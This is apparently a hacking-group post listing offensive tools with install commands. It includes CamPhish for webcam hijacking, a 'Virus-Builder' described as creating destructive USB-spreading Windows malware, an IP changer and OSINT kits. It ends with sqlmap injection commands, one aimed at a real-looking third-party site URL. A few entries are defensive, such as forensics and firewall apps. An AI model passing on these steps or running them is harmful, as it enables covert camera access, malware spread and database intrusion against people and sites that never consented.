
VIPHACKER.100 Group
Topics
Art of hacking github
web pentest tool
manual find subdomain with = crt.sh chaos.projectdiscovery.io
https://chaos.projectdiscovery.io/#/
https://crt.sh/?q=
automate subdomain = subfinder assetfinder sublist3r amass
https://github.com/tomnomnom/assetfinder
https://github.com/owasp-amass/amass
Common password list #passwords
https://github.com/danielmiessler/SecLists/tree/master/Passwords/Common-Credentials
INSTAGRAM Information Gathering tool link:-
#viphacker.100
INDIXEYE (Termux) #viphacker.100
apt-get update -y
apt-get upgrade -y
pkg install nodejs -y
pkg install git -y
Unlimited IP changes #viphacker.100
Unlimited IP changes #viphacker.100
You can either git clone the repository or curl the Bash script.
cd gr33n37-ip-changer
curl -O 'https://raw.githubusercontent.com/gr33n37/gr33n37-ip-changer/main/ip-changer.sh'
chmod +x ip-changer.sh Run the script with root privileges:
Camera hacking commands #viphacker.100
git clone https://github.com/Debajyoti0-0/Webcam_Hijacking-CamPhish.git
cd Webcam_Hijacking-CamPhish
ls
chmod +x camphish.sh
bash camphish.sh
Information Gathering tool #viphacker.100
Simply execute the following command
sudo apt install python3-pip -y
cd Brahmastra
chmod +x *
The Virus-Builder :- The Virus-Builder tool is a sophisticated program designed to create destructive malware specifically targeting Windows operating systems. This tool allows users to customize and configure the virus to automatically execute when inserted into a USB drive, increasing the potential for spreading the malware to other systems.
Installation (Termux)
[+] git clone https://github.com/Cyber-Dioxide/Virus-Builder/
[+] cd Virus-Builder
[+] ls
[+] pip install -r requirements.txt
X-OSINT Features
IP Address information
gathering
Email Address
information gathering
Location MetaData
Android forensic:- https://github.com/nowsecure/android-forensics
wifi inspector:- https://wifi-inspector.en.softonic.com/android
PROXEY + FIREWALL = SAFE ON INTERNET:-https://github.com/Gedsh/InviZible
LINUX environment APP:- https://github.com/EXALAB/AnLinux-App
Free tool by Kali:- https://www.kali.org/tools/
Nethunter Rootless:- https://gitlab.com/kalilinux/nethunter/build-scripts/kali-nethunter-project/-/tree/master/nethunter-rootless
X-TOOLKIT COMMAND
apt update && apt upgrade
pkg install git -y
git clone https://github.com/Whomrx666/X-toolkit
cd X-toolkit
chmod +x install.sh
Termux
pkg update -y && pkg upgrade -y
termux-setup-storage
pkg install wget -y && pkg install figlet -y
wget https://github.com/AryanVBW/LinuxDroid/releases/download/scripts/LinuxDroidmenu.sh && chmod +x LinuxDroidmenu.sh
wget https://github.com/AryanVBW/LinuxDroid/releases/download/A1/default.bashrc && chmod +x default.bashrc
how to install ratdecoder
cd RATDecoders
pip3 install -r requirements.txt
python3 setup.py install
Using the supplied command line tool malconf you can pass in a single file or a directory with the -r flag and it will attempt to automagically detect the family and extract any config.
SQLMAP commands
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
pip install -r requirements
python sqlmap.py -u http://www.example.com/?p=FUZZ --tables --random-agent --tamper=space2comment
OR
python sqlmap.py -u https://www.michaelkenna.com/gallery.php?id=60%27 --tables --random-agent --dbms=mysql --time-sec 5 --risk 1 --level 2 --no-cast --tamper=space2comment